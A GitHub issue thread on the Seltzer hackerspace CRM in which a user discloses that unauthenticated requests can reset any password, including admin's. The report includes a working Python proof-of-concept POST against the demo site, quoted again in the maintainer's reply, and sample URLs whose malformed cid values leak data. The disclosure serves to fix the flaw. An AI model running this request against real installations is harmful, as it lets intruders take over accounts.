search

elplatt / seltzer

CRM for hackerspaces
GNU General Public License v3.0
104 stars 50 forks source link

Unauthenticated user can change admin/any password!! #409

Closed altinukshini closed 6 years ago

altinukshini commented 6 years ago

cid is still not handled well from this issue (https://github.com/elplatt/seltzer/issues/241). An authenticated user visiting a url with a string cid param can show a lot of unwanted data: http://demo.seltzercrm.org/?q=contact&cid=j or http://demo.seltzercrm.org/?q=contact&cid="2"

I'd like to credit a young kid at our hackerspace for figuring this out and breaking our crm :D. Unauthorized/unauthenticated users can change admin/any password by making a: POST request on: http://demo.seltzercrm.org/?q=contact&cid=1 with data: {'cid': 1, 'command': 'set_password', 'password': 'lol123', 'confirm': 'lol123', 'submitted':'Change+password'}

You can try this simple python script:

import requests

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0',
    'Accept': 'application/json, text/javascript, */*; q=0.01',
    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'X-Requested-With': 'XMLHttpRequest'
}

session = requests.Session()

content = requests.post("http://demo.seltzercrm.org/index.php?q=contact&cid=1", data={'cid': 1, 'command': 'set_password', 'password': 'helloworld', 'confirm': 'helloworld', 'submitted':'Change+password'}, headers=headers)

print content
elplatt commented 6 years ago

Thanks for finding this! Can you give any more information on how this works? Is there a missing permissions check or is this somehow injecting data into the php $_SESSION variable?

Also, which hackerspace are you from? Hi!

On Tue, Feb 27, 2018 at 9:10 PM, Altin Ukshini notifications@github.com wrote:

cid is still not handled well from this issue (#241 https://github.com/elplatt/seltzer/issues/241). An authenticated user visiting a url with a string cid param can show a lot of unwanted data: http://demo.seltzercrm.org/?q=contact&cid=j or http://demo.seltzercrm.org/?q=contact&cid="2"

I'd like to credit a young kid at our hackerspace for figuring this out and breaking our crm :D. Unauthorized/unauthenticated users can change admin/any password by making a: POST request on: http://demo.seltzercrm.org/?q=contact&cid=1 with data: {'cid': 1, 'command': 'set_password', 'password': 'lol123', 'confirm': 'lol123', 'submitted':'Change+password'}

You can try this simple python script:

import requests

headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0', 'Accept': 'application/json, text/javascript, /; q=0.01', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'X-Requested-With': 'XMLHttpRequest' }

session = requests.Session()

content = requests.post("http://demo.seltzercrm.org/index.php?q=contact&cid=1", data={'cid': 1, 'command': 'set_password', 'password': 'helloworld', 'confirm': 'helloworld', 'submitted':'Change+password'}, headers=headers)

print content

— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub https://github.com/elplatt/seltzer/issues/409, or mute the thread https://github.com/notifications/unsubscribe-auth/AAS0WEQaPhaay9QpXUmIowNy8yVKA-LSks5tZLWOgaJpZM4SV9NE .

-- Edward L. Platt https://elplatt.com | @elplatt | elplatt@social.coop

Tips for stopping email overload: https://hbr.org/2012/02/stop-email-overload-1